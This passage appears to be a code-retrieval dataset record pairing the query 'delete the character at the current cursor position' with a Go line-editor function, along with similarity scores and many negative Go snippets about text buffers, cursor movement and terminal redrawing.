buffer\n\t\t\tls.refreshLine()\n\t\t}\n\t\t// navigate through the completions\n\t\tr = u.getRune(ls.ifd, nil)\n\t\tif r == KeycodeNull {\n\t\t\t// error on read\n\t\t\tstop = true\n\t\t} else if r == KeycodeTAB {\n\t\t\t// loop through the completions\n\t\t\tidx = (idx + 1) % (len(lc) + 1)\n\t\t\tif idx == len(lc) {\n\t\t\t\tbeep()\n\t\t\t}\n\t\t} else if r == KeycodeESC {\n\t\t\t// could be an escape, could be an escape sequence\n\t\t\tif wouldBlock(ls.ifd, &timeout20ms) {\n\t\t\t\t// nothing more to read, looks like a single escape\n\t\t\t\t// re-show the original buffer\n\t\t\t\tif idx < len(lc) {\n\t\t\t\t\tls.refreshLine()\n\t\t\t\t}\n\t\t\t\t// don't pass the escape key back\n\t\t\t\tr = KeycodeNull\n\t\t\t} else {\n\t\t\t\t// probably an escape sequence\n\t\t\t\t// update the buffer and return\n\t\t\t\tif idx < len(lc) {\n\t\t\t\t\tls.buf = []rune(lc[idx])\n\t\t\t\t\tls.pos = len(ls.buf)\n\t\t\t\t}\n\t\t\t}\n\t\t\tstop = true\n\t\t} else {\n\t\t\t// update the buffer and return\n\t\t\tif idx < len(lc) {\n\t\t\t\tls.buf = []rune(lc[idx])\n\t\t\t\tls.pos = len(ls.buf)\n\t\t\t}\n\t\t\tstop = true\n\t\t}\n\t}\n\t// return the last rune read\n\treturn r\n}", "func (lw *listWin) refresh() {\n\tvar inds []int\n\tfor i, task := range file.Tasks {\n\t\tok := true\n\t\tfor _, filter := range lw.filters {\n\t\t\tif !task.HasTag(filter) {\n\t\t\t\tok = false\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif ok {\n\t\t\tinds = append(inds, i)\n\t\t}\n\t}\n\n\tsort.Sort(sorter{inds, file.Tasks, lw.less})\n\n\tprojs := make(map[string]bool)\n\tctxs := make(map[string]bool)\n\n\tif err := lw.Addr(\",\"); err != nil {\n\t\tdie(1, \"Failed to set address for %s: %s\", lw.title, err)\n\t}\n\n\tfor _, i := range inds {\n\t\ttask := file.Tasks[i]\n\t\tif _, err := fmt.Fprintf(lw.Data, \"%5d. %s\\n\", i+1, task.String()); err != nil {\n\t\t\tdie(1, \"Failed to refresh window %s: %s\", lw.title, err)\n\t\t}\n\t\tfor _, t := range task.Tags(todotxt.ProjectTag) {\n\t\t\tprojs[t] = true\n\t\t}\n\t\tfor _, t := range task.Tags(todotxt.ContextTag) {\n\t\t\tctxs[t] = true\n\t\t}\n\t}\n\n\tif err := lw.Addr(\"#0\"); err != nil {\n\t\tdie(1, \"Failed to write address to %s: %s\", lw.title, err)\n\t}\n\tif err := lw.Ctl(\"dot=addr\"); err != nil {\n\t\tdie(1, \"Failed to write dot=addr to %s ctl: %s\", lw.title, err)\n\t}\n\tif err := lw.Ctl(\"show\"); err != nil {\n\t\tdie(1, \"Failed to write show to %s ctl: %s\", lw.title, err)\n\t}\n\tif err := lw.Ctl(\"clean\"); err != nil {\n\t\tdie(1, \"Failed to write clean to %s ctl: %s\", lw.title, err)\n\t}\n}", "func (ed *Editor) Redraw(full bool) {\n\ted.loop.Redraw(full)\n}", "func (c *FwRouter) Edit(vsys string, e Entry) error {\n\tvar err error\n\n\t_, fn := c.versioning()\n\tpath := c.xpath([]string{e.Name})\n\tdata := fn(e)\n\n\tif err = c.ns.Edit(e.Name, path, data); err != nil {\n\t\treturn err\n\t}\n\n\t// Remove the virtual routers from any vsys they're currently in.\n\tif err = c.con.VsysUnimport(util.VirtualRouterImport, \"\", \"\", []string{e.Name}); err != nil {\n\t\treturn err\n\t}\n\n\t// Perform vsys import next.\n\treturn c.con.VsysImport(util.VirtualRouterImport, \"\", \"\", vsys, []string{e.Name})\n}", "func (todo Todo) Update() error {\n\treturn todo.updateInPlace(func(lineNumber int, line string) (string, bool) {\n\t\tif lineNumber == todo.Line {\n\t\t\treturn todo.String(), false\n\t\t}\n\n\t\treturn line, false\n\t})\n}", "func setViewCursorToLine(g *gocui.Gui, v *gocui.View, lines []string, selLine string) error {\n\tox, _ := v.Origin()\n\tcx, _ := v.Cursor()\n\tfor y, line := range lines {\n\t\tif line == selLine {\n\t\t\tif err := v.SetCursor(ox, y); err != nil {\n\t\t\t\tif err := v.SetOrigin(cx, y); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func (this *MiniCon) RefreshDisplay() *TermBox {\n\tbox := this.box\n\tfullwidth, fullheight := box.Clear().Size()\n\n\tthis.Status.drawStatus(box, fullwidth)\n\twidth := fullwidth - leftMargin - rightMargin\n\theight := fullheight - topMargin - bottomMargin\n\n\t// re/format the hardlines --\n\t// we could cache this if that was useful.\n\trealLines := this.hardlines.Reflow(width)\n\ttotalLines := len(realLines) + this.padding\n\tlastX, lastY := leftMargin, topMargin-1\n\tif totalLines > 0 {\n\t\t// how many of the desired lines fit on screen?\n\t\tvisibleLines := height\n\t\tif totalLines < visibleLines {\n\t\t\tvisibleLines = totalLines\n\t\t}\n\t\t// subsection the real lines to just what we want to see...\n\t\ttopLine := totalLines - visibleLines\n\t\tif topLine >= 0 {\n\t\t\tlines := realLines[topLine:]\n\t\t\tfor y, line := range lines {\n\t\t\t\ty := y + topMargin\n\t\t\t\tfor x, ch := range line {\n\t\t\t\t\tx := x + leftMargin\n\t\t\t\t\tthis.box.SetCell(x, y, ch)\n\t\t\t\t\tlastX = x\n\t\t\t\t}\n\t\t\t\tlastY = y\n\t\t\t}\n\t\t}\n\t}\n\t// calc the position for the teletype\n\tvar x, y int\n\tif !this.hardlines.IsCurrentLineEmpy() {\n\t\tx = lastX + 1 // space\n\t\ty = lastY\n\t} else {\n\t\tx = leftMargin\n\t\ty = lastY + 1\n\t}\n\tthis.teletype.Resize(x, y, leftMargin, topMargin, width, height)\n\treturn this.prompt.RefreshPrompt(box)\n}" ]
[ "0.6306653", "0.6266596", "0.61689687", "0.6149421", "0.5967917", "0.5826063", "0.58000565", "0.57523245", "0.5705781", "0.5584211", "0.5578572", "0.5550107", "0.54992044", "0.54992044", "0.5471874", "0.5461494", "0.54481226", "0.5432281", "0.5408312", "0.52952456", "0.5290863", "0.5269007", "0.52570546", "0.5238158", "0.5200546", "0.5188636", "0.5181242", "0.516747", "0.51673496", "0.516087", "0.512626", "0.5108884", "0.5084302", "0.507896", "0.50726163", "0.506908", "0.50592804", "0.5056378", "0.50537676", "0.50519353", "0.5051793", "0.50510055", "0.5047477", "0.5046948", "0.50400144", "0.50375503", "0.5034003", "0.5029291", "0.50289345", "0.5019567", "0.5010051", "0.5009478", "0.49983555", "0.49949002", "0.49899682", "0.49898806", "0.49898797", "0.49854648", "0.49760666", "0.4973149", "0.4965872", "0.495989", "0.4954926", "0.49536145", "0.4916112", "0.491066", "0.4906112", "0.4899207", "0.4890614", "0.4889138", "0.4888883", "0.4885188", "0.48826995", "0.4881072", "0.48795792", "0.48795256", "0.48709285", "0.4870756", "0.4860525", "0.4846641", "0.4839129", "0.48327982", "0.48312455", "0.48271325", "0.48267993", "0.48260933", "0.48257357", "0.48235822", "0.48232114", "0.48197266", "0.48165995", "0.48164624", "0.48140556", "0.48140022", "0.48119766", "0.48114595", "0.48067796", "0.48051557", "0.4798021", "0.47961003" ]
0.6496335
0
delete the character at the current cursor position
func (ls *linestate) editDelete() { if len(ls.buf) > 0 && ls.pos < len(ls.buf) { ls.buf = append(ls.buf[:ls.pos], ls.buf[ls.pos+1:]...) ls.refreshLine() } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (e *LineEditor) DelChar() {\n\n\t// different handling for at the beginning of the line or middle of line\n\tif e.Cx > 0 {\n\t\trow := e.Row\n\t\tcopy(row[e.Cx-1:], row[e.Cx:])\n\t\trow = row[:len(row)-1]\n\t\te.Row = row\n\t\te.Cx--\n\t}\n}", "func (tv *TextView) CursorDelete(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\tif tv.HasSelection() {\n\t\ttv.DeleteSelection()\n\t\treturn\n\t}\n\t// note: no update b/c signal from buf will drive update\n\torg := tv.CursorPos\n\ttv.CursorForward(steps)\n\ttv.Buf.DeleteText(org, tv.CursorPos, true, true)\n\ttv.SetCursorShow(org)\n}", "func (m *Model) deleteAfterCursor() bool {\n\tm.value = m.value[:m.pos]\n\treturn m.setCursor(len(m.value))\n}", "func (tv *TextView) CursorDeleteWord(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\tif tv.HasSelection() {\n\t\ttv.DeleteSelection()\n\t\treturn\n\t}\n\t// note: no update b/c signal from buf will drive update\n\torg := tv.CursorPos\n\ttv.CursorForwardWord(steps)\n\ttv.Buf.DeleteText(org, tv.CursorPos, true, true)\n\ttv.SetCursorShow(org)\n}", "func DelDirtyCharacter(str string) string {\n\tres := \"\"\n\tif len(str) > 0 {\n\t\treg, _ := regexp.Compile(\"[ \\f\\n\\r\\t\\v ]+\")\n\t\tres = reg.ReplaceAllString(str, \"\")\n\t}\n\treturn res\n}", "func (l *ListInfo) deleteRune() {\n\tsc := []rune(l.Keyword)\n\tl.Keyword = string(sc[:(len(sc) - 1)])\n}", "func (c *Canvas) Delete(cr *Cursor) error {\n\tif cr.X >= canvasWidth || cr.Y >= canvasHeight {\n\t\treturn fmt.Errorf(`(%d, %d) is out of the Canvas size`, cr.X, cr.Y)\n\t}\n\n\t(*c)[cr.Y][cr.X] = 0\n\n\treturn nil\n}", "func (e *Editor) Delete(runes int) {\n\tif runes == 0 {\n\t\treturn\n\t}\n\n\tif l := e.caret.end.ofs - e.caret.start.ofs; l != 0 {\n\t\te.caret.start.ofs = e.editBuffer.deleteRunes(e.caret.start.ofs, l)\n\t\trunes -= sign(runes)\n\t}\n\n\te.caret.start.ofs = e.editBuffer.deleteRunes(e.caret.start.ofs, runes)\n\te.caret.start.xoff = 0\n\te.ClearSelection()\n\te.invalidate()\n}", "func (e *ObservableEditableBuffer) DeleteAt(rp0, rp1 int) {\n\tp0 := e.f.RuneTuple(rp0)\n\tp1 := e.f.RuneTuple(rp1)\n\n\te.Delete(p0, p1)\n}", "func (e *Editor) deleteWord(distance int) {\n\tif distance == 0 {\n\t\treturn\n\t}\n\n\te.makeValid()\n\n\tif e.caret.start.ofs != e.caret.end.ofs {\n\t\te.Delete(1)\n\t\tdistance -= sign(distance)\n\t}\n\tif distance == 0 {\n\t\treturn\n\t}\n\n\t// split the distance information into constituent parts to be\n\t// used independently.\n\twords, direction := distance, 1\n\tif distance < 0 {\n\t\twords, direction = distance*-1, -1\n\t}\n\t// atEnd if offset is at or beyond either side of the buffer.\n\tatEnd := func(offset int) bool {\n\t\tidx := e.caret.start.ofs + offset*direction\n\t\treturn idx <= 0 || idx >= e.editBuffer.len()\n\t}\n\t// next returns the appropriate rune given the direction and offset.\n\tnext := func(offset int) (r rune) {\n\t\tidx := e.caret.start.ofs + offset*direction\n\t\tif idx < 0 {\n\t\t\tidx = 0\n\t\t} else if idx > e.editBuffer.len() {\n\t\t\tidx = e.editBuffer.len()\n\t\t}\n\t\tif direction < 0 {\n\t\t\tr, _ = e.editBuffer.runeBefore(idx)\n\t\t} else {\n\t\t\tr, _ = e.editBuffer.runeAt(idx)\n\t\t}\n\t\treturn r\n\t}\n\tvar runes = 1\n\tfor ii := 0; ii < words; ii++ {\n\t\tif r := next(runes); unicode.IsSpace(r) {\n\t\t\tfor r := next(runes); unicode.IsSpace(r) && !atEnd(runes); r = next(runes) {\n\t\t\t\trunes += 1\n\t\t\t}\n\t\t} else {\n\t\t\tfor r := next(runes); !unicode.IsSpace(r) && !atEnd(runes); r = next(runes) {\n\t\t\t\trunes += 1\n\t\t\t}\n\t\t}\n\t}\n\te.Delete(runes * direction)\n}", "func (c *client) deleteCharacter(cID int64, uID string) error {\n\tauthorized, err := c.isOwner(cID, uID)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !authorized {\n\t\treturn errorutil.New(http.StatusForbidden, \"can't delete someone else's character...\")\n\t}\n\n\tif _, err := c.db.Exec(\n\t\t`DELETE FROM Characters\n\t\t WHERE CharacterKey = ?`,\n\t\tcID); err != nil {\n\t\tlog.Printf(\"\\ncouldn't exec row delete for deleteCharacter: %v\", err)\n\t\treturn errorutil.New(http.StatusInternalServerError, \"internal error\")\n\t}\n\treturn nil\n}", "func RestoreCursorPos() {\n\temitEscape(\"u\")\n}", "func (m *Model) deleteBeforeCursor() bool {\n\tm.value = m.value[m.pos:]\n\tm.offset = 0\n\treturn m.setCursor(0)\n}", "func (c *CmdBuff) Delete() {\n\tif c.Empty() {\n\t\treturn\n\t}\n\tc.SetText(string(c.buff[:len(c.buff)-1]), \"\")\n\tc.fireBufferChanged(c.GetText(), c.GetSuggestion())\n\tif c.hasCancel() {\n\t\treturn\n\t}\n\n\tctx, cancel := context.WithTimeout(context.Background(), 800*time.Millisecond)\n\tc.setCancel(cancel)\n\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tc.fireBufferCompleted(c.GetText(), c.GetSuggestion())\n\t\tc.resetCancel()\n\t}()\n}", "func (m *Model) deleteWordRight() bool {\n\tif m.pos >= len(m.value) || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.deleteAfterCursor()\n\t}\n\n\toldPos := m.pos\n\tm.setCursor(m.pos + 1)\n\tfor unicode.IsSpace(m.value[m.pos]) {\n\t\t// ignore series of whitespace after cursor\n\t\tm.setCursor(m.pos + 1)\n\n\t\tif m.pos >= len(m.value) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tfor m.pos < len(m.value) {\n\t\tif !unicode.IsSpace(m.value[m.pos]) {\n\t\t\tm.setCursor(m.pos + 1)\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif m.pos > len(m.value) {\n\t\tm.value = m.value[:oldPos]\n\t} else {\n\t\tm.value = append(m.value[:oldPos], m.value[m.pos:]...)\n\t}\n\n\treturn m.setCursor(oldPos)\n}", "func (e *Editor) ClearSelection() {\n\te.caret.end = e.caret.start\n}", "func TextEraseChars(n int) string {\n\treturn Esc + strconv.Itoa(n) + \"X\"\n}", "func (i *Input) Backspace() {\n\tif i.Pos > 0 {\n\t\ti.Buffer.RemoveRune(i.Pos - 1)\n\t\ti.Pos--\n\t}\n}", "func (i *Input) backspace() {\n\tcurLine := i.lines[i.cursorLineIndex]\n\t// at the beginning of the buffer, nothing to do\n\tif len(curLine) == 0 && i.cursorLineIndex == 0 {\n\t\treturn\n\t}\n\n\t// at the beginning of a line somewhere in the buffer\n\tif i.cursorLinePos == 0 {\n\t\tprevLine := i.lines[i.cursorLineIndex-1]\n\t\t// remove the newline character from the prevline\n\t\tprevLine = prevLine[:len(curLine)-1] + curLine\n\t\ti.lines = append(i.lines[:i.cursorLineIndex], i.lines[i.cursorLineIndex+1:]...)\n\t\ti.cursorLineIndex--\n\t\ti.cursorLinePos = len(prevLine) - 1\n\t\treturn\n\t}\n\n\t// I'm at the end of a line\n\tif i.cursorLinePos == len(curLine)-1 {\n\t\ti.lines[i.cursorLineIndex] = curLine[:len(curLine)-1]\n\t\ti.cursorLinePos--\n\t\treturn\n\t}\n\n\t// I'm in the middle of a line\n\ti.lines[i.cursorLineIndex] = curLine[:i.cursorLinePos-1] + curLine[i.cursorLinePos:]\n\ti.cursorLinePos--\n}", "func (tv *TextView) CursorKill() {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tpos := tv.CursorPos\n\n\tatEnd := false\n\tif wln := tv.WrappedLines(pos.Ln); wln > 1 {\n\t\tsi, ri, _ := tv.WrappedLineNo(pos)\n\t\tllen := len(tv.Renders[pos.Ln].Spans[si].Text)\n\t\tif si == wln-1 {\n\t\t\tllen--\n\t\t}\n\t\tatEnd = (ri == llen)\n\t} else {\n\t\tllen := tv.Buf.LineLen(pos.Ln)\n\t\tatEnd = (tv.CursorPos.Ch == llen)\n\t}\n\tif atEnd {\n\t\ttv.CursorForward(1)\n\t} else {\n\t\ttv.CursorEndLine()\n\t}\n\ttv.Buf.DeleteText(org, tv.CursorPos, true, true)\n\ttv.SetCursorShow(org)\n}", "func (tb *TextBuf) DeleteText(st, ed TextPos, saveUndo, signal bool) *TextBufEdit {\n\tst = tb.ValidPos(st)\n\ted = tb.ValidPos(ed)\n\tif st == ed {\n\t\treturn nil\n\t}\n\tif !st.IsLess(ed) {\n\t\tlog.Printf(\"giv.TextBuf DeleteText: starting position must be less than ending!: st: %v, ed: %v\\n\", st, ed)\n\t\treturn nil\n\t}\n\ttb.FileModCheck() // note: could bail if modified but not clear that is better?\n\ttbe := tb.Region(st, ed)\n\ttb.SetChanged()\n\ttb.LinesMu.Lock()\n\ttbe.Delete = true\n\tif ed.Ln == st.Ln {\n\t\ttb.Lines[st.Ln] = append(tb.Lines[st.Ln][:st.Ch], tb.Lines[st.Ln][ed.Ch:]...)\n\t\ttb.LinesMu.Unlock()\n\t\tif saveUndo {\n\t\t\ttb.SaveUndo(tbe)\n\t\t}\n\t\ttb.LinesEdited(tbe)\n\t} else {\n\t\t// first get chars on start and end\n\t\tstln := st.Ln + 1\n\t\tcpln := st.Ln\n\t\ttb.Lines[st.Ln] = tb.Lines[st.Ln][:st.Ch]\n\t\teoedl := len(tb.Lines[ed.Ln][ed.Ch:])\n\t\tvar eoed []rune\n\t\tif eoedl > 0 { // save it\n\t\t\teoed = make([]rune, eoedl)\n\t\t\tcopy(eoed, tb.Lines[ed.Ln][ed.Ch:])\n\t\t}\n\t\ttb.Lines = append(tb.Lines[:stln], tb.Lines[ed.Ln+1:]...)\n\t\tif eoed != nil {\n\t\t\ttb.Lines[cpln] = append(tb.Lines[cpln], eoed...)\n\t\t}\n\t\ttb.NLines = len(tb.Lines)\n\t\ttb.LinesMu.Unlock()\n\t\tif saveUndo {\n\t\t\ttb.SaveUndo(tbe)\n\t\t}\n\t\ttb.LinesDeleted(tbe)\n\t}\n\n\tif signal {\n\t\ttb.TextBufSig.Emit(tb.This(), int64(TextBufDelete), tbe)\n\t}\n\tif tb.Autosave {\n\t\tgo tb.AutoSave()\n\t}\n\treturn tbe\n}", "func (tv *TextView) DeleteSelection() *TextBufEdit {\n\ttbe := tv.Buf.DeleteText(tv.SelectReg.Start, tv.SelectReg.End, true, true)\n\ttv.SelectReset()\n\treturn tbe\n}", "func TextDeleteChars(n int) string {\n\treturn Esc + strconv.Itoa(n) + \"P\"\n}", "func (m *Model) deleteWordLeft() bool {\n\tif m.pos == 0 || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.deleteBeforeCursor()\n\t}\n\n\t// Linter note: it's critical that we acquire the initial cursor position\n\t// here prior to altering it via SetCursor() below. As such, moving this\n\t// call into the corresponding if clause does not apply here.\n\toldPos := m.pos //nolint:ifshort\n\n\tblink := m.setCursor(m.pos - 1)\n\tfor unicode.IsSpace(m.value[m.pos]) {\n\t\tif m.pos <= 0 {\n\t\t\tbreak\n\t\t}\n\t\t// ignore series of whitespace before cursor\n\t\tblink = m.setCursor(m.pos - 1)\n\t}\n\n\tfor m.pos > 0 {\n\t\tif !unicode.IsSpace(m.value[m.pos]) {\n\t\t\tblink = m.setCursor(m.pos - 1)\n\t\t} else {\n\t\t\tif m.pos > 0 {\n\t\t\t\t// keep the previous space\n\t\t\t\tblink = m.setCursor(m.pos + 1)\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif oldPos > len(m.value) {\n\t\tm.value = m.value[:m.pos]\n\t} else {\n\t\tm.value = append(m.value[:m.pos], m.value[oldPos:]...)\n\t}\n\n\treturn blink\n}", "func (r *runestring) Del(pos ...int) {\n\tfor _, i := range pos {\n\t\tif i >= 0 && i <= len(*r) {\n\t\t\t*r = append((*r)[:i], (*r)[i+1:]...)\n\t\t}\n\t}\n}", "func (r *Row) insertChar (char string, index int) {\n content := r.content.Bytes()\n newBuffer := bytes.NewBuffer(nil)\n\n newBuffer.Write(content[:index])\n newBuffer.Write([]byte(char))\n newBuffer.Write(content[index:])\n\n r.content = newBuffer\n r.size = newBuffer.Len()\n}", "func (tv *TextView) CursorBackspace(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tif tv.HasSelection() {\n\t\torg = tv.SelectReg.Start\n\t\ttv.DeleteSelection()\n\t\ttv.SetCursorShow(org)\n\t\treturn\n\t}\n\t// note: no update b/c signal from buf will drive update\n\ttv.CursorBackward(steps)\n\ttv.ScrollCursorToCenterIfHidden()\n\ttv.RenderCursor(true)\n\ttv.Buf.DeleteText(tv.CursorPos, org, true, true)\n}", "func (ls *linestate) deletePrevWord() {\n\toldPos := ls.pos\n\t// remove spaces\n\tfor ls.pos > 0 && ls.buf[ls.pos-1] == ' ' {\n\t\tls.pos--\n\t}\n\t// remove word\n\tfor ls.pos > 0 && ls.buf[ls.pos-1] != ' ' {\n\t\tls.pos--\n\t}\n\tls.buf = append(ls.buf[:ls.pos], ls.buf[oldPos:]...)\n\tls.refreshLine()\n}", "func RemoveChar(word string) string {\n\treturn word[1 : len(word)-1]\n}", "func (r *Render) clear(cursor int) {\n\tr.move(cursor, 0)\n\tr.out.EraseDown()\n}", "func (tv *TextView) CursorBackspaceWord(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tif tv.HasSelection() {\n\t\ttv.DeleteSelection()\n\t\ttv.SetCursorShow(org)\n\t\treturn\n\t}\n\t// note: no update b/c signal from buf will drive update\n\ttv.CursorBackwardWord(steps)\n\ttv.ScrollCursorToCenterIfHidden()\n\ttv.RenderCursor(true)\n\ttv.Buf.DeleteText(tv.CursorPos, org, true, true)\n}", "func ClearLinePartialForward() {\n\temitEscape(\"K\")\n}", "func (ls *linestate) editBackspace() {\n\tif ls.pos > 0 && len(ls.buf) > 0 {\n\t\tls.buf = append(ls.buf[:ls.pos-1], ls.buf[ls.pos:]...)\n\t\tls.pos--\n\t\tls.refreshLine()\n\t}\n}", "func (b *Buffer) PutChar(c byte) error {\n\tb.Cursor.Char = c\n\to := b.Cursor.Offset(b.Width)\n\tt := b.Expand(o).Tile(o)\n\tt.Update(&b.Cursor.Tile)\n\tb.Cursor.X++\n\tb.Cursor.NormalizeAndWrap(b.Width)\n\tb.maxWidth = calc.MaxInt(b.maxWidth, b.Cursor.X)\n\tb.maxHeight = calc.MaxInt(b.maxHeight, b.Cursor.Y)\n\treturn nil\n}", "func (ls *linestate) deleteToEnd() {\n\tls.buf = ls.buf[:ls.pos]\n\tls.refreshLine()\n}", "func (t *Trie) Delete(word string) {\n\tn := t.find(word)\n\tif n.end == true {\n\t\tn.end = false\n\t}\n}", "func (ls *linestate) editInsert(r rune) {\n\tls.buf = append(ls.buf[:ls.pos], append([]rune{r}, ls.buf[ls.pos:]...)...)\n\tls.pos++\n\tls.refreshLine()\n}", "func SaveCursorPos() {\n\temitEscape(\"s\")\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func (e *ObservableEditableBuffer) Delete(q0, q1 OffsetTuple) {\n\tbefore := e.getTagStatus()\n\tdefer e.notifyTagObservers(before)\n\n\te.f.Delete(q0, q1, e.seq)\n\tif e.seq < 1 {\n\t\te.f.FlattenHistory()\n\t}\n\te.deleted(q0, q1)\n}", "func (s *BaseCGListener) ExitEscapedchar(ctx *EscapedcharContext) {}", "func (tb *TextBuf) Redo() *TextBufEdit {\n\tif tb.UndoPos >= len(tb.Undos) {\n\t\treturn nil\n\t}\n\ttbe := tb.Undos[tb.UndoPos]\n\tif tbe.Delete {\n\t\ttb.DeleteText(tbe.Reg.Start, tbe.Reg.End, false, true)\n\t} else {\n\t\ttb.InsertText(tbe.Reg.Start, tbe.ToBytes(), false, true)\n\t}\n\ttb.UndoPos++\n\treturn tbe\n}", "func CursorMove(x, y int) string {\n\tvar s string\n\tif x < 0 {\n\t\ts = Esc + strconv.Itoa(-x) + \"D\"\n\t} else if x > 0 {\n\t\ts = Esc + strconv.Itoa(x) + \"C\"\n\t}\n\tif y < 0 {\n\t\ts += Esc + strconv.Itoa(-y) + \"A\"\n\t} else if y > 0 {\n\t\ts += Esc + strconv.Itoa(y) + \"B\"\n\t}\n\treturn s\n}", "func ClearLine() {\n\temitEscape(\"K\", 2)\n}", "func DeleteEdit(word string) Edit {\n\treturn Edit{\n\t\tType: \"remove\",\n\t\tDelete: word,\n\t}\n}", "func (e *T) erase() {\n\tif e.widx <= 0 {\n\t\treturn\n\t}\n\te.widx--\n\te.buf[e.widx] = 0\n}", "func (c *Cursor) Delete() error {\n\tif c.bucket.tx.db == nil {\n\t\treturn ErrTxClosed\n\t} else if !c.bucket.Writable() {\n\t\treturn ErrTxNotWritable\n\t}\n\n\tkey, _, flags := c.keyValue()\n\t// Return an error if current value is a bucket.\n\tif (flags & bucketLeafFlag) != 0 {\n\t\treturn ErrIncompatibleValue\n\t}\n\t// 从node中移除,本质上将inode数组进行移动\n\tc.node().del(key)\n\n\treturn nil\n}", "func (ptr *Application) onClickMenuEditDelete() {\n\tptr.textEditor.Delete()\n}", "func ClearLine() {\n\tfmt.Printf(\"\\033[2K\")\n}", "func ClearLine() {\n\tfmt.Printf(\"\\033[2K\")\n}", "func (tv *TextView) KeyInputInsertRune(kt *key.ChordEvent) {\n\tkt.SetProcessed()\n\tif tv.ISearch.On { // todo: need this in inactive mode\n\t\ttv.CancelComplete()\n\t\ttv.ISearchKeyInput(kt)\n\t} else if tv.QReplace.On { // todo: need this in inactive mode\n\t\ttv.CancelComplete()\n\t\ttv.QReplaceKeyInput(kt)\n\t} else {\n\t\tif kt.Rune == '{' || kt.Rune == '(' || kt.Rune == '[' {\n\t\t\tbufUpdt, winUpdt, autoSave := tv.Buf.BatchUpdateStart()\n\t\t\tpos := tv.CursorPos\n\t\t\tvar close = true\n\t\t\tif pos.Ch < tv.Buf.LineLen(pos.Ln) && !unicode.IsSpace(tv.Buf.Line(pos.Ln)[pos.Ch]) {\n\t\t\t\tclose = false\n\t\t\t}\n\t\t\tpos.Ch++\n\t\t\tif close {\n\t\t\t\tmatch, _ := PunctGpMatch(kt.Rune)\n\t\t\t\ttv.InsertAtCursor([]byte(string(kt.Rune) + string(match)))\n\t\t\t\ttv.lastAutoInsert = match\n\t\t\t} else {\n\t\t\t\ttv.InsertAtCursor([]byte(string(kt.Rune)))\n\t\t\t}\n\t\t\ttv.SetCursorShow(pos)\n\t\t\ttv.SetCursorCol(tv.CursorPos)\n\t\t\ttv.Buf.BatchUpdateEnd(bufUpdt, winUpdt, autoSave)\n\t\t} else if kt.Rune == '}' && tv.Buf.Opts.AutoIndent {\n\t\t\ttv.CancelComplete()\n\t\t\ttv.lastAutoInsert = 0\n\t\t\tbufUpdt, winUpdt, autoSave := tv.Buf.BatchUpdateStart()\n\t\t\ttv.InsertAtCursor([]byte(string(kt.Rune)))\n\t\t\ttbe, _, cpos := tv.Buf.AutoIndent(tv.CursorPos.Ln, DefaultIndentStrings, DefaultUnindentStrings)\n\t\t\tif tbe != nil {\n\t\t\t\ttv.RenderLines(tv.CursorPos.Ln, tv.CursorPos.Ln)\n\t\t\t\ttv.SetCursorShow(TextPos{Ln: tbe.Reg.End.Ln, Ch: cpos})\n\t\t\t}\n\t\t\ttv.Buf.BatchUpdateEnd(bufUpdt, winUpdt, autoSave)\n\t\t} else if tv.lastAutoInsert == kt.Rune { // if we type what we just inserted, just move past\n\t\t\ttv.CursorPos.Ch++\n\t\t\ttv.SetCursorShow(tv.CursorPos)\n\t\t\ttv.lastAutoInsert = 0\n\t\t} else {\n\t\t\ttv.lastAutoInsert = 0\n\t\t\ttv.InsertAtCursor([]byte(string(kt.Rune)))\n\t\t\tif kt.Rune == ' ' {\n\t\t\t\ttv.CancelComplete()\n\t\t\t} else {\n\t\t\t\ttv.OfferComplete()\n\t\t\t}\n\t\t}\n\t\tif kt.Rune == '}' || kt.Rune == ')' || kt.Rune == ']' {\n\t\t\tcp := tv.CursorPos\n\t\t\tnp := cp\n\t\t\tnp.Ch--\n\t\t\ttp, found := tv.Buf.FindScopeMatch(kt.Rune, np)\n\t\t\tif found {\n\t\t\t\ttv.Scopelights = append(tv.Scopelights, NewTextRegionPos(tp, TextPos{tp.Ln, tp.Ch + 1}))\n\t\t\t\ttv.Scopelights = append(tv.Scopelights, NewTextRegionPos(np, TextPos{cp.Ln, cp.Ch}))\n\t\t\t\tif tv.CursorPos.Ln < tp.Ln {\n\t\t\t\t\ttv.RenderLines(cp.Ln, tp.Ln)\n\t\t\t\t} else {\n\t\t\t\t\ttv.RenderLines(tp.Ln, cp.Ln)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func CursorPos(x, y int) string {\n\treturn Esc + strconv.Itoa(y+1) + \";\" + strconv.Itoa(x+1) + \"H\"\n}", "func GuiTextBoxDelete(text string, length int, before bool) (int, string) {\n\tctext := C.CString(text)\n\tdefer C.free(unsafe.Pointer(ctext))\n\tres := C.GuiTextBoxDelete(ctext, C.int(int32(length)), C.bool(before))\n\treturn int(int32(res)), C.GoString(ctext)\n}", "func (s *Store) DeleteLine(line int) (string, error) {\n\tif line < 0 || line >= len(s.lines) {\n\t\treturn \"\", fmt.Errorf(\"newLine: Invalid 